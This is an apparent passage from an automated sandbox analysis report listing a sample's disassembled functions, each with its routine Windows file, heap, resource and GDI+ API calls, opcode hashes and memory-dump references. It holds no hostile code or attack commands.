                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: f9bf32077d871a0bace553ec060ee66f466b2e76b6dfcbbfc708bc7a45fcf528
                                                                                                              • Instruction ID: ed4df7265f431afb8263d7b04a8c64d58dbf8a0fbe35f3d2719b26b2f3dce8d4
                                                                                                              • Opcode Fuzzy Hash: f9bf32077d871a0bace553ec060ee66f466b2e76b6dfcbbfc708bc7a45fcf528
                                                                                                              • Instruction Fuzzy Hash: 1D4126B0805B409EE724DF7A8489AE7FBE5FF18304F50492ED5EE87282CB366554CB19
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00441383
                                                                                                                • Part of subcall function 00445FB1: __EH_prolog.LIBCMT ref: 00445FB6
                                                                                                                • Part of subcall function 0044C413: __EH_prolog.LIBCMT ref: 0044C418
                                                                                                                • Part of subcall function 0044C413: new.LIBCMT ref: 0044C45B
                                                                                                                • Part of subcall function 0044C413: new.LIBCMT ref: 0044C47F
                                                                                                              • new.LIBCMT ref: 004413FB
                                                                                                                • Part of subcall function 0044AC66: __EH_prolog.LIBCMT ref: 0044AC6B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: 72355ef37c68975cb1db2e80a8dafe5ee8eb279613c7a5f4fbf70bda60969f39
                                                                                                              • Instruction ID: 8a3668f7f3fbbb60c1208bd96b12c2c1ba24c87b3199e68205af1aa0ce83f7b9
                                                                                                              • Opcode Fuzzy Hash: 72355ef37c68975cb1db2e80a8dafe5ee8eb279613c7a5f4fbf70bda60969f39
                                                                                                              • Instruction Fuzzy Hash: DF4127B0805B409EE724DF7A8489AE7FBE5FF18304F50492ED5EE83282CB366554CB19
                                                                                                              APIs
                                                                                                                • Part of subcall function 0046631F: GetLastError.KERNEL32(?,0047CBE8,00462674,0047CBE8,?,?,00462213,?,?,0047CBE8), ref: 00466323
                                                                                                                • Part of subcall function 0046631F: _free.LIBCMT ref: 00466356
                                                                                                                • Part of subcall function 0046631F: SetLastError.KERNEL32(00000000,?,0047CBE8), ref: 00466397
                                                                                                                • Part of subcall function 0046631F: _abort.LIBCMT ref: 0046639D
                                                                                                                • Part of subcall function 00468576: _abort.LIBCMT ref: 004685A8
                                                                                                                • Part of subcall function 00468576: _free.LIBCMT ref: 004685DC
                                                                                                                • Part of subcall function 004681EB: GetOEMCP.KERNEL32(00000000,?,?,00468474,?), ref: 00468216
                                                                                                              • _free.LIBCMT ref: 004684CF
                                                                                                              • _free.LIBCMT ref: 00468505
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 2991157371-0
                                                                                                              • Opcode ID: f27140dd5d12ba34e7ba98a58d2c5fade134a7ffbe413ed39d5fb7b06fb1f427
                                                                                                              • Instruction ID: 5282a7164adad34dc70328ef113ea016bf6ddb1fb77ebfd13507b4eab796baaf
                                                                                                              • Opcode Fuzzy Hash: f27140dd5d12ba34e7ba98a58d2c5fade134a7ffbe413ed39d5fb7b06fb1f427
                                                                                                              • Instruction Fuzzy Hash: 7431A471904209AFDB10EF69D481A9EB7F4EF40324F25429FE9089B291FF399D41CB5A
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00449B87,?,?,00447735), ref: 00449579
                                                                                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00449B87,?,?,00447735), ref: 004495AE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: dfb02390da5580bf661a5f326174c2db4a620efc1b5688828c5748593a273127
                                                                                                              • Instruction ID: f8a21ed4dc64168c46228b0f13a5498d882c33f7f42c40f2b09d4e3592e0f9c2
                                                                                                              • Opcode Fuzzy Hash: dfb02390da5580bf661a5f326174c2db4a620efc1b5688828c5748593a273127
                                                                                                              • Instruction Fuzzy Hash: E021E4B2404748AFE7318F14C885BA7B7E8EB45368F10492EF4D582691C378AD499A65
                                                                                                              APIs
                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00447436,?,?,?), ref: 00449A2C
                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00449ADC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$BuffersFlushTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1392018926-0
                                                                                                              • Opcode ID: cd2f7d98f9cec3dabbfe61c1632ce5a5d1ed7426e4ce2ce2de4631304874445e
                                                                                                              • Instruction ID: 1794cf036202f1faba27b4f96bb74e5d984304deaf96351d55acb6899791dfde
                                                                                                              • Opcode Fuzzy Hash: cd2f7d98f9cec3dabbfe61c1632ce5a5d1ed7426e4ce2ce2de4631304874445e
                                                                                                              • Instruction Fuzzy Hash: 3221B1311582C5AFE711DE24C881AABBBD8AB96708F04091EB8C1D7281D72DED4CE755
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00467795
                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004677A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2279764990-0
                                                                                                              • Opcode ID: 845fb777304b7e2c4844212e0c458ca129ddf371687c1331b83509c4a5900009
                                                                                                              • Instruction ID: cc119b652436c17285806a0aeaa5908450f0d907f34cc21534f26f7b824eafc0
                                                                                                              • Opcode Fuzzy Hash: 845fb777304b7e2c4844212e0c458ca129ddf371687c1331b83509c4a5900009
                                                                                                              • Instruction Fuzzy Hash: 06110A37A042219B9B219F29EC8095B7395EBC472AB160232FD14AB354F635FC8187DB
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00449B21
                                                                                                              • GetLastError.KERNEL32 ref: 00449B2D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2976181284-0
                                                                                                              • Opcode ID: 2b9b8f95ff8ced99343ccfab3bd86107c8d369da4f1bbd7a9be000c9a8a16bf2
                                                                                                              • Instruction ID: 9bc1b10fabd65a60878adacea49af4bc3a2e7bf628c4fe6d5569ed747874848d
                                                                                                              • Opcode Fuzzy Hash: 2b9b8f95ff8ced99343ccfab3bd86107c8d369da4f1bbd7a9be000c9a8a16bf2
                                                                                                              • Instruction Fuzzy Hash: B60192707053846BFB349E29EC45B67B7D9EB85328F14853FB156C3680DB39EC089615
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 004498EB
                                                                                                              • GetLastError.KERNEL32 ref: 004498F8
                                                                                                                • Part of subcall function 004496AA: __EH_prolog.LIBCMT ref: 004496AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileH_prologLastPointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 4236474358-0
                                                                                                              • Opcode ID: 4c9991663dc5dd0e79fd88e1e81219b043eb7a3c5a533c987518060951cbd387
                                                                                                              • Instruction ID: ca0cc24a20f833618593b12d8c508bc086f6b4e401c78bed324efbec47e5cef6
                                                                                                              • Opcode Fuzzy Hash: 4c9991663dc5dd0e79fd88e1e81219b043eb7a3c5a533c987518060951cbd387
                                                                                                              • Instruction Fuzzy Hash: 8201B572610205EBAB18AF5A9C449AB7759BF83330718432FF926DB391D734DC01A765
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00465B0B
                                                                                                                • Part of subcall function 004659FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004623AA,?,0000015D,?,?,?,?,00462F29,000000FF,00000000,?,?), ref: 00465A2E
                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,00200000,?,?,0047CBE8,004417A1,?,?,?,?,00000000,?,00441378,?,?), ref: 00465B47
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1482568997-0
                                                                                                              • Opcode ID: df29a5aa6aeb5bfde934c2fea8fe7cf5863ba5223159bdf6e15ca4891bdf250f
                                                                                                              • Instruction ID: bb9cc94579e818b2396ec202482e128924a74a64b2c56cf41fd7c937039ebc96
                                                                                                              • Opcode Fuzzy Hash: df29a5aa6aeb5bfde934c2fea8fe7cf5863ba5223159bdf6e15ca4891bdf250f
                                                                                                              • Instruction Fuzzy Hash: 74F04F32601A15A69B312A26AC01E6B37589F81F70F14412BF818962A1FA3CA80181AF
                                                                                                              APIs
                                                                                                              • LoadStringW.USER32(?,?,00000200,?), ref: 0044D187
                                                                                                              • LoadStringW.USER32(?,?,00000200,?), ref: 0044D19D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LoadString
                                                                                                              • String ID:
                                                                                                              • API String ID: 2948472770-0
                                                                                                              • Opcode ID: 161d41956b4837ce7b4034ea90d63352b8445a1c5cd7427c2528b91010206d08
                                                                                                              • Instruction ID: a372dc49783abae03f49a5d1aaafa08ad539e3199276ba87a3430b50fd1417c7
                                                                                                              • Opcode Fuzzy Hash: 161d41956b4837ce7b4034ea90d63352b8445a1c5cd7427c2528b91010206d08
                                                                                                              • Instruction Fuzzy Hash: B4F0C272B012287FFA219F11EC85FAB7B5AEB05384F01053AFA8C96161D6255C9187AC
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 0044FCB3
                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 0044FCBA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                              • String ID:
                                                                                                              • API String ID: 1231390398-0
                                                                                                              • Opcode ID: 0c8dfba30534615c9b9c9263f6938e1783c2e167b55127241ffa9bdc1b475272
                                                                                                              • Instruction ID: 39e0c739558c09719ccdbaa20b84a96027081842dc7009ba56696c568a1c38a5
                                                                                                              • Opcode Fuzzy Hash: 0c8dfba30534615c9b9c9263f6938e1783c2e167b55127241ffa9bdc1b475272
                                                                                                              • Instruction Fuzzy Hash: F9E09232E0110EA7AF0886A4AC849EF739DFA05210724417BED0AD3200FA38DD4957A8
                                                                                                              APIs
                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00449EF9,?,?,?,00449D92,?,00000001,00000000,?,?), ref: 0044A0D7
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00449EF9,?,?,?,00449D92,?,00000001,00000000,?,?), ref: 0044A108
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: fd69f31db98d07fac4e264c7b6ae160f565126e9e9ebee7476171880fab0ef45
                                                                                                              • Instruction ID: c3d0a9b8e616b8e7358fb6bd8045c93e261af8a6ef2ce4460bb02cd7028711ef
                                                                                                              • Opcode Fuzzy Hash: fd69f31db98d07fac4e264c7b6ae160f565126e9e9ebee7476171880fab0ef45
                                                                                                              • Instruction Fuzzy Hash: A0F0A731141109ABEF115F50EC05BDA775DFB04386F044066BD8896151DB75C9A89A54
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemText_swprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3011073432-0
                                                                                                              • Opcode ID: e268c1811c28cb29599455715b4f44f256b622b9ac4d2d395cf7cbb133ecffbb
                                                                                                              • Instruction ID: 699454cac87a2a5a23f10d603ac419eed142c74204e2515ea70aa98cad2227aa
                                                                                                              • Opcode Fuzzy Hash: e268c1811c28cb29599455715b4f44f256b622b9ac4d2d395cf7cbb133ecffbb
                                                                                                              • Instruction Fuzzy Hash: 59F05C32954308FAE711BBA18C07F9E3B1DA704747F00006FBE05921E3D5755E24975E
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00449611,?,?,0044946C), ref: 00449DBD
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00449611,?,?,0044946C), ref: 00449DEB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: ada817f4d13f6a4da6b41e45c845d070010116abb750ad7bb130933fe0c58311
                                                                                                              • Instruction ID: 89738ee809efd06e0c57b561ff5577096b62b21b446d4b3b63f589eccba783d4
                                                                                                              • Opcode Fuzzy Hash: ada817f4d13f6a4da6b41e45c845d070010116abb750ad7bb130933fe0c58311
                                                                                                              • Instruction Fuzzy Hash: 9DE02231A4120DABEB109F61EC42BEB739DEB08382F840076BD88C2150DB71CC94AA98
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00449E08,?,004475A0,?,?,?,?), ref: 00449E24
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00449E08,?,004475A0,?,?,?,?), ref: 00449E50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 2ffff514359c39879778ad6c92b90ca90f21cfe89ce41796e4576b325596a42b
                                                                                                              • Instruction ID: 070fff9df42d793cd8d20c5c461ad32ba1b742d6c194036bc770b063160e1a34
                                                                                                              • Opcode Fuzzy Hash: 2ffff514359c39879778ad6c92b90ca90f21cfe89ce41796e4576b325596a42b
                                                                                                              • Instruction Fuzzy Hash: E0E09B325002585BDB51ABA8DC05BDA775CEB097F2F0001B2FD48E3290D7749D899BD8
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0044F324
                                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0044DEC8,Crypt32.dll,?,0044DF4A,?,0044DF2E,?,?,?,?), ref: 0044F346
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1175261203-0
                                                                                                              • Opcode ID: 467851fb601a9739fdd0f2213c3573cba0ed2fa31416afc82cc5060f357ff6c3
                                                                                                              • Instruction ID: bd0f2324f9dcad71cc234d52e0d2581c3097f0d4fa8d7edcb853cb1ba183cbc5
                                                                                                              • Opcode Fuzzy Hash: 467851fb601a9739fdd0f2213c3573cba0ed2fa31416afc82cc5060f357ff6c3
                                                                                                              • Instruction Fuzzy Hash: A3E01272811158ABDB11AAA59C05FDB77ACEB083D2F0440A6B948D2105DA74D984CBF4
                                                                                                              APIs
                                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00458945
                                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0045894C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                                              • String ID:
                                                                                                              • API String ID: 1918208029-0
                                                                                                              • Opcode ID: fb8c4040ec6dee639a124fd20a331f2157520e3865737f23911e2c43593f057f
                                                                                                              • Instruction ID: 2d0a24566c435e761c66d497688a949164e3f45118e7bfc0265d55476ecee597
                                                                                                              • Opcode Fuzzy Hash: fb8c4040ec6dee639a124fd20a331f2157520e3865737f23911e2c43593f057f
                                                                                                              • Instruction Fuzzy Hash: 4CE03071400208EFC710DF89C4017A9BBF8EB04312F10846FAC4493201D6746E089B96
                                                                                                              APIs
                                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,0046F79B,000000FF), ref: 004590C7
                                                                                                              • CoUninitialize.COMBASE(?,?,?,0046F79B,000000FF), ref: 004590CC
                                                                                                              Memory Dump Source
